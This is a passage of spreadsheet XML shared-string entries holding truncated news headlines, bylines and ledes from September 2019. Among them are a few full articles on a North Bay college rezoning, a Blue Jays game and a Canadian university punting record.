    <t>Cryptocurrency advocates have recently discovered that Bitcoin Core ( BTC ) developers are planning to disable the payment protocol BIP70...</t>
  </si>
  <si>
    <t>Sept 5 (Reuters) - Argentine and Chile renewed their combative rivalry in Los Angeles on Thursday in a game that was peppered with 10...</t>
  </si>
  <si>
    <t>By Tyler J. Carter Judge Rudy Delgado was sentenced to five years in prison on Thursday for accepting bribes for favorable outcomes in...</t>
  </si>
  <si>
    <t>It’s finally here! Link’s Awakening finally dropped for the Nintendo Switch on Friday and the boys have some thoughts. Andy is joined by...</t>
  </si>
  <si>
    <t>Toronto: Filmax Acquires Lucia Alemany’s ‘The Innocence’ (EXCLUSIVE)</t>
  </si>
  <si>
    <t>If you own shares in Gulf Resources, Inc. (NASDAQ:GURE) then it's worth thinking about how it contributes to the volatility of your...</t>
  </si>
  <si>
    <t>Olivia Clement</t>
  </si>
  <si>
    <t>Ricardo Pérez González's On the Grounds of Belonging, directed by David Mendizábal, will kick off the new season in New Haven.</t>
  </si>
  <si>
    <t>Dublin, Sept. 17, 2019 (GLOBE NEWSWIRE) -- The "Electrical Digital Twin Market by Twin Type (Gas &amp; Steam Power Plant, Wind Farm,...</t>
  </si>
  <si>
    <t>The U.S. trade deficit narrowed slightly in July, but the gap with China, a focus of the Trump administration's "America First" agenda,...</t>
  </si>
  <si>
    <t>Gareth Southgate lauded Harry Kane’s elite mentality and superb finishing after the England captain netted a hat-trick in the comprehensive...</t>
  </si>
  <si>
    <t>Marc Levy</t>
  </si>
  <si>
    <t>Though a renovation of Harvard Square’s iconic kiosk doesn’t begin until the spring, it will be empty as soon as Oct. 31, city staff said...</t>
  </si>
  <si>
    <t>Ronald Brakebill</t>
  </si>
  <si>
    <t>From lace-up heels at Ulla Johnson to colorful sandals at Rag &amp; Bone and futuristic sneakers at Longchamp, fresh and fun shoe trends are...</t>
  </si>
  <si>
    <t>MILWAUKEE, Sept. 6, 2019 /PRNewswire-PRWeb/ -- AAEA has named a new editor of the Applied Economics Perspectives &amp; Policy (AEPP). Mindy...</t>
  </si>
  <si>
    <t>Letters to the Editor</t>
  </si>
  <si>
    <t>Did the young women on the Lynbrook High School tennis team say that Persky had lost their trust?</t>
  </si>
  <si>
    <t>Solos Endoscopy, Inc. Successfully introduces MammoView at the Annual Conference of Association of Breast Surgeons of India WESTPORT, CT,...</t>
  </si>
  <si>
    <t>By Park Boram SEOUL, Sept. 4 (Yonhap) -- Since its debut in 2010, "Running Man" has captivated fans at home and in the broader Asian...</t>
  </si>
  <si>
    <t>BERLIN - German business confidence has picked up slightly after a five-month decline, but managers are more pessimistic about their...</t>
  </si>
  <si>
    <t>Derby manager Phillip Cocu has revealed how a rained-off game of ‘foot golf’ escalated into a drinking session which saw his captain ruled...</t>
  </si>
  <si>
    <t>LONDON, Sept 30 (Reuters) - Sterling inched higher on Monday after a week of hefty losses, showing little reaction to data showing a...</t>
  </si>
  <si>
    <t>September 20, 2019 10:21 AM EAST LANSING, Mich. (AP) - A former football recruiter who is suing Michigan State says he urged coach Mark...</t>
  </si>
  <si>
    <t>TAMPA, Fla. (AP) — The Daniel Jones era is off to a rousing start for the New York Giants. The rookie quarterback threw for 336 yards and...</t>
  </si>
  <si>
    <t>By:                                       Homa Bash</t>
  </si>
  <si>
    <t>A simple cabinet stands on along a road in Rocky River, Ohio — and what’s inside is helping people in the community every single day. The...</t>
  </si>
  <si>
    <t>"We haven't done anything, yet." It's the five words reverberating around Canberra Raiders headquarters on the eve of their second NRL...</t>
  </si>
  <si>
    <t>Stu Campaigne</t>
  </si>
  <si>
    <t>An “Innovation Park” beckons and brings with it the promise of “370 jobs, conservatively,” with more to follow in the coming years, thanks to “organic growth.” This from Canadore College President and CEO George Burton, who said the school and its partners will follow all regulations and requirements but he has five companies signed on and ready to fill spaces in such a facility. The proposed development off Cedar Heights Road is a perfect fit for the school and its private industry investors, according to Burton. The narrow, mile-long strip of land running north and south parallel to Larocque Road would be built in a “condo-style” arrangement, says Burton, with partitioned workspaces, such as laboratories, research facilities, and a movie studio. All within walking distance to the college’s main campus and removed enough from the city to provide the lower vibrations necessary for the research work planned for the facility. Paul Goodridge, an Ontario land surveyor, addressed North Bay City Council at a special committee meeting last evening on behalf of the project and also fielded questions from around the table. The matter at hand at the special meeting was a rezoning from its current residential designation to a type of industrial classification with various uses, including for a post-secondary institution. Citizen Peter Handley, a nearby resident to the proposed site, had raised concerns about the fall-out if one of the proponents (including Candore) had a change of heart and pulled out of the deal. He wondered whether that swath of land off Cedar Heights would remain rezoned as industrial. Nevertheless, Handley’s questions were answered and he seemed content. Handley did warn, however, the Council should include strict language that the development proceeds only with an “educational component,” not as pure industry. Following the meeting, Burton gave a glimpse of his vision for the project. Besides the movie studio and pharmaceutical aspect, the Innovation Park would include a testing facility for lighting and an agricultural area for “grow pods,” what Burton termed as “zero carbon emission,” agriculture. A packaging company would also take residence at the facility to package the pharmaceuticals and agricultural output. Burton said these are all collaborations with companies that have been in the works for the last year or so, although the concept has been in the planning stages for much longer. He said the five companies eager to see this development move past the rezoning stage and into construction all have a research component consistent with Canadore College programming. The community services committee moved the rezoning file to the council for a vote. Still to be decided is whether a holding zone designation attached by the City’s planning department will remain in place until its questions about the proposal are answered satisfactorily. Goodridge expressed a desire for Council to remove the designation so the project can proceed under site plan control and without further delay.</t>
  </si>
  <si>
    <t>Doina Chiacu</t>
  </si>
  <si>
    <t>The White House has not ruled out a potential meeting between President Donald Trump and Iranian President Hassan Rouhani even after...</t>
  </si>
  <si>
    <t>Hammersmith Bridge could cost £120m to repair, engineers have estimated as the first stage of work begins. The 132-year-old bridge was...</t>
  </si>
  <si>
    <t>Knott’s Scary Farm designers hope to create a seamless transition between the new Origins: The Curse of Calico haunted maze, the Ghost Town...</t>
  </si>
  <si>
    <t>T'Cha Dunlevy, Montreal Gazette                        More from T'Cha Dunlevy, Montreal Gazette;Jan Thijs;Jan Thijs</t>
  </si>
  <si>
    <t>The zombies in Blood Quantum are white, coming to the Red Crow reserve either to seek refuge or to eat the Indigenous population alive</t>
  </si>
  <si>
    <t>Again in April, we reviewed the Galaxy Fold, and issues didn’t go based on plan. We skilled points with the evaluate unit’s show that...</t>
  </si>
  <si>
    <t>By ANDREW MELDRUM</t>
  </si>
  <si>
    <t>African heads of state and envoys are gathering to attend a state funeral for Zimbabwe's founding president, Robert Mugabe , whose burial...</t>
  </si>
  <si>
    <t>All-Terrain Vehicle Market 2019 Global Industry Analysis by Trends, Size, Sales, Merger, Acquisitions, Key Players with Forecast To 2023,...</t>
  </si>
  <si>
    <t>Lisa Li is a seasoned leader in the pharmaceutical industry in China, with comprehensive knowledge and experience in sales and marketing.</t>
  </si>
  <si>
    <t>Calamos Advisors LLC acquired a new position in shares of Tactile Systems Technology Inc (NASDAQ:TCMD) during the 2nd quarter, according...</t>
  </si>
  <si>
    <t>The "Global Safety Light Curtain Market Analysis &amp; Trends - Industry Forecast to 2027" report has been added to ResearchAndMarkets.com's...</t>
  </si>
  <si>
    <t>Jamie Golding</t>
  </si>
  <si>
    <t>Name: Gracie (2334) Sex: Female, spayed Breed: Labrador retriever/pointer/pit bull mix Age: More than 8 years old Size: Large Cost:...</t>
  </si>
  <si>
    <t>USA – Stained glass windows have traditionally provided a beautiful visual backdrop that’s added passion and power to services inside...</t>
  </si>
  <si>
    <t>WASHINGTON (AP) — Ice cream maker Ben &amp; Jerry's has unveiled a new flavor to highlight what it calls structural racism and a broken...</t>
  </si>
  <si>
    <t>MEMPHIS, Tenn., Sept. 12, 2019 /PRNewswire/ -- TRUE Sports, Inc., a sporting goods manufacturer with a legacy of more than 100 years of...</t>
  </si>
  <si>
    <t>By MOLLY GLENTZER</t>
  </si>
  <si>
    <t>HOUSTON On a muggy August morning, even some of the tropical animals at the Houston Zoo looked weary of summer, draping laconically over...</t>
  </si>
  <si>
    <t>Oil prices were steady on Thursday but headed for a weekly loss, weighed down by slowing Chinese economic growth that dampens the demand...</t>
  </si>
  <si>
    <t>Hundreds of people are attending a rally in Belfast calling for a second referendum on EU membership.</t>
  </si>
  <si>
    <t>theusposts</t>
  </si>
  <si>
    <t>HEAVYWEIGHT boxing take’s centre stage once again at the Royal Albert Hall. Daniel Dubois returns to the ring following his demolition of...</t>
  </si>
  <si>
    <t>REDWOOD SHORES, Calif., Sept. 30, 2019 /PRNewswire/ -- Oracle today announced that it has been recognized, for the fourth consecutive year,...</t>
  </si>
  <si>
    <t>Josh Skapin</t>
  </si>
  <si>
    <t>After playing for clubs in Texas and British Columbia, Marco Carducci’s professional soccer career has brought him home. When the...</t>
  </si>
  <si>
    <t>Boris Johnson’s claims to be accomplishing a Brexit renegotiation have come below recent doubt as the United Kingdom’s closest EU best...</t>
  </si>
  <si>
    <t>by THOMAS BEAUMONT and BILL BARROW Associated Press</t>
  </si>
  <si>
    <t>CEDAR RAPIDS, Iowa (AP) — Democratic presidential candidates Joe Biden and Pete Buttigieg are taking a no-compromise approach on...</t>
  </si>
  <si>
    <t>By McKinley Corbley -</t>
  </si>
  <si>
    <t>This 4-year-old cancer survivor was given the surprise of a lifetime after his neighbors rallied together for a very special birthday gift....</t>
  </si>
  <si>
    <t>findyoursounds</t>
  </si>
  <si>
    <t>DUKE DUMONT &amp; MK ANNOUNCE EXCLUSIVE EVENTS IN THREE MAJOR U.S. CITIES THIS FALL SPECIAL PERFORMANCES TO TAKE PLACE IN BROOKLYN, SAN...</t>
  </si>
  <si>
    <t>Ryan Gilkes</t>
  </si>
  <si>
    <t>Prime Minister Mia Mottley has again stressed the importance of Barbados being prepared for the Atlantic Hurricane Season, which impacts...</t>
  </si>
  <si>
    <t>Kylie Jenner has been hospitalized with an undisclosed illness and will have to skip a planned cosmetics rollout at Paris Fashion Week The...</t>
  </si>
  <si>
    <t>Presidential views on Africa-Japan partnership – Opinion Ahram OnlinePresident Abdel-Fattah El-Sisi, presented a comprehensive view of...</t>
  </si>
  <si>
    <t>Insulet Corporation (NASDAQ: PODD) (Insulet or the Company), the global leader in tubeless insulin pump technology with its Omnipod®...</t>
  </si>
  <si>
    <t>coinmaker</t>
  </si>
  <si>
    <t>Altcoins are continuing their unexpected explosive bull run, while Bitcoin is trading flat at around $10,200. Tuesday, Sept. 17 — Altcoins...</t>
  </si>
  <si>
    <t>Huawei [HWT.UL] launches what could be the world's smartest 5G phone on Thursday, but its fate in Europe will hang on whether customers...</t>
  </si>
  <si>
    <t>TITUSVILLE, FL / ACCESSWIRE / September 11, 2019 / In a decision with potential implications for hospitals nationwide, a Federal Judge has...</t>
  </si>
  <si>
    <t>COSTA MESA, Calif., Sept. 16, 2019 /PRNewswire-PRWeb/ -- After successfully funding and delivering the first portable Lever Espresso maker,...</t>
  </si>
  <si>
    <t>The two attacks shut down half the country's oil production.</t>
  </si>
  <si>
    <t>Via Ninety Miles From Tyranny Source: https://freenorthcarolina.blogspot.com/2019/09/on-recycled-lies-of-our-globalist.html</t>
  </si>
  <si>
    <t>DENVER, Sept. 20, 2019 /PRNewswire/ - CIBC (NYSE: CM) (TSX: CM) today announced there will be no constituent additions or deletions to the...</t>
  </si>
  <si>
    <t>TEHRAN (FNA)- Senior Iranian and Swiss officials in a meeting discussed ways for expanding cooperation in different fields.</t>
  </si>
  <si>
    <t>By JIM NELSON jim.nelson@wcfcourier.com</t>
  </si>
  <si>
    <t>CEDAR FALLS -- Mark Farley was all smiles Saturday after Northern Iowa's 34-14 domination of Southern Utah. It was victory 150 for Farley,...</t>
  </si>
  <si>
    <t>Mount Gibson Iron Limited (ASX:MGX) insider Hui Lee bought 130,000 shares of the stock in a transaction on Friday, September 13th. The...</t>
  </si>
  <si>
    <t>NORTHBROOK, Ill., Sept. 25, 2019 /PRNewswire/ -- Allstate has earned the No. 1 spot on the 2020 Military Friendly® Employers list, and one...</t>
  </si>
  <si>
    <t>Sept. 5, 2019, NEW YORK /PRNewswire/ — Paxos Trust Company, a regulated financial institution that digitizes and mobilizes assets, today...</t>
  </si>
  <si>
    <t>Greg Ulmer, head of Lockheed Martin Corp's F-35 fighter program, will temporarily lead the company's aeronautics division while its current...</t>
  </si>
  <si>
    <t>Lafayette Investments Inc. reduced its holdings in shares of Discovery Communications Inc. (NASDAQ:DISCA) by 16.3% during the 2nd quarter,...</t>
  </si>
  <si>
    <t>By Michelle Nichols UNITEDNATIONS (Reuters) – U.S. President Donald Trump called for an end to religious persecution on Monday at a U.S....</t>
  </si>
  <si>
    <t>Terraria-in-space-ish Starbound has been hanging around my peripheral gameision (it’s a word, no you shut up) since its inception as an...</t>
  </si>
  <si>
    <t>Despite signs that the U.S. economy is slowing, New York-based Citigroup Inc is betting big on credit cards.</t>
  </si>
  <si>
    <t>Greg Harder, Regina Leader-Post</t>
  </si>
  <si>
    <t>Veteran goaltender Bailey Brkin made a nice first impression on the Moose Jaw Warriors, who held on for a 5-3 win over the Regina Pats on...</t>
  </si>
  <si>
    <t>ANDREW POTTS, Gold Coast Bulletin</t>
  </si>
  <si>
    <t>A GOLD Coast school community has been left reeling after being targeted by vandals using homophobic and racial slurs.</t>
  </si>
  <si>
    <t>stackexchange</t>
  </si>
  <si>
    <t>So after some google searching apparently I don’t even know what this technique is specifically called: I’m trying to figure out how to...</t>
  </si>
  <si>
    <t>CEDAR ISLAND, N.C. (AP) — A North Carolina wild horse manager says more than half of one herd is thought to be dead after Hurricane Dorian...</t>
  </si>
  <si>
    <t>Vijievan Jeevathayalan</t>
  </si>
  <si>
    <t>Things just don’t seem to be going for Marcus Rashford at the moment, do they? The England international started the campaign in the...</t>
  </si>
  <si>
    <t>Ryan Wolstat                        More from Ryan Wolstat</t>
  </si>
  <si>
    <t>ST. PETERSBURG — There’s no place like home for Bo Bichette. Playing in front of his parents and at least a few friends not far from where he played high school ball, Toronto’s superstar-in-waiting belted a pair of home runs and added to his gaudy totals in what was eventually another Blue Jays loss, 6-4 to the Tampa Bay Rays. Bichette started the game with as good of a leadoff at-bat as anyone could produce. The star rookie battled through 12 pitches from Rays starter Austin Pruitt before depositing the 13th over the wall. Bichette wasn’t done impressing, either. He made it a multi-homer effort for the second time in his abbreviated career by blasting a two-run shot with two outs in the seventh. Though he couldn’t add another hit in the bottom of the ninth, Bichette now has 25 extra base hits in his first 34 games, second-best all-time behind only all-time great Joe DiMaggio’s 27. Bichette had gone 5-for-13 here earlier this season, with three doubles and a home run, not long after being called up The Rays evened the game up in the fourth when a poor throw by Bichette was mishandled by Justin Smoak and popped loose. That allowed a runner to score from second. More less than ideal defence led to the second Tampa run when Vladimir Guerrero Jr. could not corral a pop-up behind third base. The fielding follies didn’t end there as the Rays added a fourth run in the sixth when Teoscar Hernandez had another adventure in centre field, resulting in extra bases, followed by left fielder Derek Fisher dropping a fly ball. Though Bichette squared the game again in the seventh, the Rays responded with a mammoth Austin Meadows home run in the bottom of the inning and added another in the eighth. Jays starter Trent Thornton cruised early, looking nothing like the pitcher who had given up 14 runs and 23 hits in 11.1 innings this season against Tampa Bay heading in. However, it didn’t last and his control abandoned him. Thornton walked three in his 4.2 innings and also hit a pair of batters as the Jays dropped to 55-86, losing a fourth game in a row. LET THE KIDS PLAY The call-ups of Anthony Alford and Jonathan Davis presented manager Charlie Montoyo with a bit of a challenge – how to get the many outfielders now on hand enough playing time in the final three weeks or so of the season. “Yeah, that’s going to be tough so I’m going to have to pinch-hit more than I usually do to do the matchups and stuff to get them in games,” Montoyo said. “Because I think we’ve got like six, seven outfielders (when Lourdes Gurriel Jr. returns in the next few days), and they’ve all got to play more or less … Everybody is going to get a chance.” Montoyo said Gurriel, who has been out for nearly a month due to a quad injury, will play a simulated game on Friday and could be back by Sunday, or else when the team returns home. Gurriel’s previously scheduled simulation for Thursday was scrapped because he was still feeling sore, Montoyo said. THE AMAZING RACE Before the season began, New York and Boston were expected to run away with baseball’s toughest division. While the Yankees are on the way to 100-plus wins, Boston has under-performed, Toronto and Baltimore have been awful and Tampa Bay has once again overachieved. The Rays entered Thursday in the thick of a tight race with Oakland and Cleveland for the two American League wild card spots. The Athletics rallied to win on Thursday to briefly pull ahead by percentage points, while Cleveland sat a game back after losing. Oakland has a game in hand on Tampa Bay and two on Cleveland. The Rays last made the playoffs in 2013 and have made the post-season four times (two AL East titles, two wild card appearances) since beginning play in 1998. With seven of the final 22 games of the season coming against Tampa Bay, Toronto will have some influence on the race. “We play to win every day,” Montoyo said. “I always tell (his many friends in the Rays organization) I’m hoping you clinch before you come to Toronto the last (few) days. I don’t want to feel guilty and spoil it. So I always kid around with them, because I want them to do well, (manager Kevin Cash is) my buddy. But we’re professionals, we’re playing to win games.” Tampa will be bolstered by the imminent return of starter Blake Snell, who won the Cy Young last season and is about to embark on a rehab assignment. AROUND THE BASES Only 5,962 fans were on hand, a stunningly low total even for Tampa and one of the worst crowds in franchise history. The NFL opener going didn’t help matters, but that’s just pathetic, especially considering the standings and the chance to see Toronto’s star rookies. The Rays drew a then record-low 5,786 against Toronto back in May … Bichette became the fourth rookie Blue Jay with two leadoff homers in a season, joining Rick Bosetti, Reed Johnson and Devon Travis … Cavan Biggio made three stellar plays at second base on Thursday in the early going, including a run-saver in the second. Biggio added another, saving a run or two, with a great stab to end the fifth. Biggio also stole his 10th base of the season without being caught. Only Shannon Stewart also started his Jays career at least 10-for-10 in stolen base attempts … Wilmer Font will open for the Jays on Saturday, with prospect Anthony Kay potentially making his debut behind him. Kay was one of the two players acquired in exchange for Marcus Stroman … Guerrero had perhaps the best slide of the season when he appeared to defy physics to avoid a tag for a triple … Former Jay Aaron Sanchez will miss the rest of the season and undergo shoulder surgery. @WolstatSun</t>
  </si>
  <si>
    <t>MOUNTAIN VIEW, Calif., Sept. 19, 2019 (GLOBE NEWSWIRE) -- The International Future Computing Summit (IFCS, IFC Summit) is the leading...</t>
  </si>
  <si>
    <t>Kit Harington felt the need to "grow the f**k up" after 'Game of Thrones' came to and end this year. The 32-year-old actor checked himself...</t>
  </si>
  <si>
    <t>Honda is enjoying some very healthy sales numbers, scoring a 20 percent gain in August and making it the brand’s best month of sales. The...</t>
  </si>
  <si>
    <t>Robert Kelly</t>
  </si>
  <si>
    <t>TransAlta Renewables Inc. (TSE:RNW) Ratings Coverage Among 4 analysts covering TransAlta Renewable (TSE:RNW), 0 have Buy rating, 0 Sell and...</t>
  </si>
  <si>
    <t>CHANDIGARH, INDIA, September 4, 2019 /EINPresswire.com/ -- George Brown College, Toronto, Canada, and Chitkara University, Punjab, signed a...</t>
  </si>
  <si>
    <t>FREDERICTON — A new record for the longest punt in Canadian university football history — 114 yards — has now been recognized more than half a century after it occurred. The kick, by Thomas Pinckard of the University of New Brunswick, was launched on Sept. 24, 1966 in a game between the Red Bombers and Saint Dunstan's University, which would later become the University of Prince Edward Island. Pinckard booted the football from his team's 21-yard line and it bounced over the heads of the Saint Dunstan's kick returners, across the goal line and out the back of the end zone at UNB's College Field, which at the time had end zones that were 25-yards long. The university says the kick was recorded at the time as 89 yards. However, after a comprehensive review that included analysis of College Field blueprints and sworn affidavits from Red Bombers teammates and the game's official timer, the Fredericton school says the governing body of university sports in Canada now recognizes Pinckard's punt travelled 114 yards — 13 yards longer than the previous national record. Aaron Gazendam, playing for the University of Toronto Varsity Blues, kicked a 101-yard punt in a game against Western on Sept. 20, 2014. UNB also says it believes the kick is longer than any punt recorded at any level of university or professional football in North America. It says the longest punt in NCAA history is 99 yards by Nevada's Pat Brady, in October of 1950. The longest punt in NFL history travelled 98 yards, off the foot of Steve O'Neal of the New York Jets in September 1969, while the longest punt in CFL history — and previously the longest punt ever recorded — is a 108-yard kick by Zenon Andrusyshyn of the Toronto Argonauts in October 1977. "I think it's pretty neat," Pinckard said in a news release. "There were so many elements to that kick that you couldn't repeat. The weather conditions, the fact it wasn't wet. Had it been, it wouldn't have got the bounces it got." In an interesting twist, the new record is now held by a player who wasn't even UNB's punter. At the time, Pinckard was the team's long snapper. "I could kick," he said. "I would always come out to practice and guys would shag punts for me, but I wasn't the kicker because I was the long ball snapper, so I couldn't be in both positions at the same time. But the kicker got hurt, so that day, I was the punter." This report from The Canadian Press was first published Sept. 24, 2019. The Canadian Press</t>
  </si>
  <si>
    <t>BAGGETTA’S TAKE In many ways, Harvey-Brunswick-Leschenault league coach John Baggetta feels he has adopted 25 sons each week during 2019....</t>
  </si>
  <si>
    <t>MOSCOW (AP) — Residents of Russia’s capital voted Sunday in a city council election shadowed by a wave of protests that saw the biggest...</t>
  </si>
  <si>
    <t>Kelly Davio</t>
  </si>
  <si>
    <t>During this week’s European Society for Medical Oncology (ESMO) Congress 2019, held September 27 to October 1 in Barcelona, Spain, a...</t>
  </si>
  <si>
    <t>DONGGUAN, China, Sept. 12, 2019 /PRNewswire/ -- In the evening of 11th September, 2019 (Beijing Time), the Dongguan Basketball Center...</t>
  </si>
  <si>
    <t>Mark Boggis</t>
  </si>
  <si>
    <t>Mascots from across the region are coming together for a dance off at Pleasurewood Hills in Lowestoft this Saturday.</t>
  </si>
  <si>
    <t>Dublin, Sept. 19, 2019 (GLOBE NEWSWIRE) -- The "Graphite Global Market Opportunities and Strategies to 2022" report has been added...</t>
  </si>
  <si>
    <t>ENYO Pharma, a private clinical stage biotechnology company developing innovative drug candidates, today announced the appointment of...</t>
  </si>
  <si>
    <t>FREETOWN, Sierra Leone A Sierra Leone official says 12 people have been rescued and no one was killed after a three-story building under...</t>
  </si>
  <si>
    <t>touchmaven_x</t>
  </si>
  <si>
    <t>The biggest win of the night went to Game of Thrones. The show got best drama series, plus Peter Dinklage won best supporting actor in a...</t>
  </si>
  <si>
    <t>Ryan Young</t>
  </si>
  <si>
    <t>GUILTY PLEA: Jye Leslie Schultz leaves Dubbo court on Wednesday. A teenager, who tried to ride an injured emu before he pulled off its...</t>
  </si>
  <si>
    <t>New York City, NY: September 30, 2019 – Published via (Wired Release) – The market research report of the Global Intelligent Gate-control...</t>
  </si>
  <si>
    <t>QINGDAO, China, Sept. 26, 2019 /PRNewswire/ -- The recent holding of the very first Global Laser Display Technology and Industry...</t>
  </si>
  <si>
    <t>Mobile Virtual Network Operator (MVNO) Market research report provides significant information of the Mobile Virtual Network Operator...</t>
  </si>
  <si>
    <t>Marc Waddington;Liam Beard</t>
  </si>
  <si>
    <t>WARNING: THIS STORY CONTAINS DISTRESSING IMAGES A dog was left to die on top of a mountain after it developed a huge tumour on its face. It...</t>
  </si>
  <si>
    <t>James Ives, M.Psych. (Editor)</t>
  </si>
  <si>
    <t>Tel Aviv University and Sheba Medical Center researchers say they have discovered why more than half of patients with metastatic melanoma...</t>
  </si>
  <si>
    <t>Joel Erickson</t>
  </si>
  <si>
    <t>In the aftermath of the Regional Express flight that was forced into an emergency landing at Merimbula Airport, I've noticed a number of...</t>
  </si>
  <si>
    <t>AM Best has revised the outlooks to positive from stable and affirmed the Financial Strength Rating (FSR) of A (Excellent) and the...</t>
  </si>
  <si>
    <t>CBTS, a leading technology provider that delivers communications, cloud, infrastructure, and ­consulting solutions to clients across North...</t>
  </si>
  <si>
    <t>Serial killer Stephen Port’s ex-drug dealer has been jailed for at least 31 years for the “wicked and callous” murder of a former Bond film...</t>
  </si>
  <si>
    <t>By Calvin Cashen</t>
  </si>
  <si>
    <t>Published Sep 26, 2019 8 Laurie Anderson is a bit of an enigma. The artist's lone hit, "O Superman," was a perplexing crossover song that...</t>
  </si>
  <si>
    <t>Over the last decade, home buying has been on on the rise in Colorado, Radon Mitigation of The Rockies is providing new homeowners radon...</t>
  </si>
  <si>
    <t>by Terry Gangcuangco</t>
  </si>
  <si>
    <t>“They will play an essential role in delivering our strategy for UK clients and brokers”</t>
  </si>
  <si>
    <t>NEW YORK, Sept. 19, 2019 /PRNewswire/ -- As technology has altered the way we communicate with each other, it is no secret that the written...</t>
  </si>
  <si>
    <t>Fuel Tech Inc (NASDAQ:FTEK) has been given a consensus broker rating score of 1.00 (Strong Buy) from the one analysts that provide coverage...</t>
  </si>
  <si>
    <t>Summary of "Glycine Receptor is differentially expressed in the rat retina at early stages of streptozotocin-induced diabetes." Affiliation...</t>
  </si>
  <si>
    <t>New York City</t>
  </si>
  <si>
    <t>1 New York City New York City News &amp; Search 1 News - 1 eMovies - 1 eMusic - 1 eBooks - 1 Search Search for: The flight attendant who...</t>
  </si>
  <si>
    <t>Sep, Sat 21 2019 - 11:00 AM to 12:30 PM</t>
  </si>
  <si>
    <t>Originally posted on https://www.securedatatech.com/managed-services-defined/ Managed Services are the process of outsourcing business...</t>
  </si>
  <si>
    <t>WALTHAM, Mass., Sept. 24, 2019 (GLOBE NEWSWIRE) -- AP Intego, technology-enabled small business insurance leader, today announced that...</t>
  </si>
  <si>
    <t>ZAPTEST is announcing LOAD performance testing technology. LOAD will be providing ZAPTEST users the capability to do API performance...</t>
  </si>
  <si>
    <t>Dublin, Sept. 03, 2019 (GLOBE NEWSWIRE) -- The "Contrast Media Agents Market to 2027- Global Analysis and Forecasts By Type; Imaging...</t>
  </si>
  <si>
    <t>Albert Pujols hit a three-run homer off Ryan Yarbrough in the fifth inning and drove in four runs, leading the Los Angeles Angels over...</t>
  </si>
  <si>
    <t>By Beth Allcock</t>
  </si>
  <si>
    <t>EASYJET is cutting down on flight faff with a brand new tool for passengers. The budget airline revealed its latest top and told how it...</t>
  </si>
  <si>
    <t>By Alison Roman, The New York Times</t>
  </si>
  <si>
    <t>Buttery garlic shrimp is ladled onto toast topped with slices of ripe tomato, in New York, June 3, 2019. Food trends come and go, but...</t>
  </si>
  <si>
    <t>By Quint Forgey</t>
  </si>
  <si>
    <t>A new national survey shows Elizabeth Warren now sitting atop the 2020 Democratic field, further cementing her ascendancy in the party’s...</t>
  </si>
  <si>
    <t>TORONTO, Sept. 11, 2019 /CNW/ - The following issues have been halted by IIROC: Company: Karnalyte Resources Inc. TSX Symbol: KRN (all...</t>
  </si>
  <si>
    <t>DARPA’s Subterranean Challenge aims to make cave exploration a more robotic affair. Outside its cavernous passageways, the mine’s entrance...</t>
  </si>
  <si>
    <t>The "In-Depth: Practical Statistical Analysis for the Energy &amp; Power Markets" conference has been added to ResearchAndMarkets.com's...</t>
  </si>
  <si>
    <t>Many tech companies wouldn't be affected by Sanders' proposal because they tend to pay employees high salaries. But Amazon and Apple would...</t>
  </si>
  <si>
    <t>LAGUNA NIGUEL, Calif. (AP) — Magic Johnson’s game-worn jersey from the 1992 Barcelona Olympics is up for bid in an auction that ends this...</t>
  </si>
  <si>
    <t>Mobile app downloads of Facebook are down 15% year over year so far in the third quarter of 2019, a Bank of America analysis found.</t>
  </si>
  <si>
    <t>SAN FRANCISCO, Sept. 19, 2019 /PRNewswire-PRWeb/ -- The Aquarium of the Bay, PIER 39 is hosting an annual Blue Marble Benefit Gala Event...</t>
  </si>
  <si>
    <t>Chanakya</t>
  </si>
  <si>
    <t>India will seek international support for domestic growth; deepen US partnership; build ties with other key powers; cooperate and compete...</t>
  </si>
  <si>
    <t>OTTAWA, Ontario, Sept. 9, 2019 /PRNewswire/ -- Cody Coyote is ready to share knowledge, Indigenous language and a new sound through his...</t>
  </si>
  <si>
    <t>ETA International’s annual Education Forum has extended the deadline to submit session proposals from people passionate about wireless...</t>
  </si>
  <si>
    <t>CAIRO (AP) — Sudan’s newly appointed prime minister launched an independent investigation into a deadly crackdown on protesters in June,...</t>
  </si>
  <si>
    <t>Treasury yields fall on Tuesday as traders push the price of European and U.S. government paper higher, amid concerns around U.K. Prime...</t>
  </si>
  <si>
    <t>Debbie L. Sklar</t>
  </si>
  <si>
    <t>A man who disappeared overnight after going swimming in the ocean in Pacific Beach was found back home at a friend’s house, lifeguards said...</t>
  </si>
  <si>
    <t>Blogs - TalkMarkets</t>
  </si>
  <si>
    <t>Reviewing the day's trading in the agriculture markets.</t>
  </si>
  <si>
    <t>BERLIN (AP) - Scientists say bottlenose dolphins in the English Channel harbor a "toxic cocktail" of chemicals, some of which have been...</t>
  </si>
  <si>
    <t>SOURCE PowerSetter While PowerSetter optimizes energy rates, ecobee's smart thermostats optimize energy usage NEW YORK, Sept. 10, 2019...</t>
  </si>
  <si>
    <t>0 comment The British-flagged Stena Impero tanker is leaving Iran, two months after it was seized, according to owner Stena Bulk. The...</t>
  </si>
  <si>
    <t>roxy2707 (Posted by)</t>
  </si>
  <si>
    <t>At least 22 people were injured when decks collapsed on one another at three-story home on the Jersey Shore. Authorities say the collapse...</t>
  </si>
  <si>
    <t>09/03/2019 13:20 LONDON/BUENOS AIRES (Reuters) - Argentina's peso opened sharply stronger on Tuesday, marking Wall Street's first reaction...</t>
  </si>
  <si>
    <t>VANCOUVER — Environment Minister George Heyman says British Columbia can't stop the Trans Mountain pipeline expansion project but will use...</t>
  </si>
  <si>
    <t>Daniel Strauss</t>
  </si>
  <si>
    <t>The Federal Reserve on Friday auctioned another $72 billion worth of market repurchase agreements, or repos, in a continued effort to calm...</t>
  </si>
  <si>
    <t>Extinction Rebellion protesters covered in fake blood have glued themselves to an entrance to London Fashion Week. Pictures posted by the...</t>
  </si>
  <si>
    <t>. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ....</t>
  </si>
  <si>
    <t>Wiseguyreports.Com Publish New Market Research Report On -“Commerce Cloud Solution Market 2019 Global Analysis, Size, Share, Trends,...</t>
  </si>
  <si>
    <t>Zacks Equity Research</t>
  </si>
  <si>
    <t>JetBlue Airways Corporation JBLU reported traffic figures for August. Traffic, measured in revenue passenger miles (RPMs), increased 3.9%...</t>
  </si>
  <si>
    <t>LOS ANGELES, CA / ACCESSWIRE / September 29, 2019 / Compare-autoinsurance.org has released a new blog post that provides several...</t>
  </si>
  <si>
    <t>Orlando, FL - Canadian player development experts are finally seeing the fruit of their labor become a reality. After many years of...</t>
  </si>
  <si>
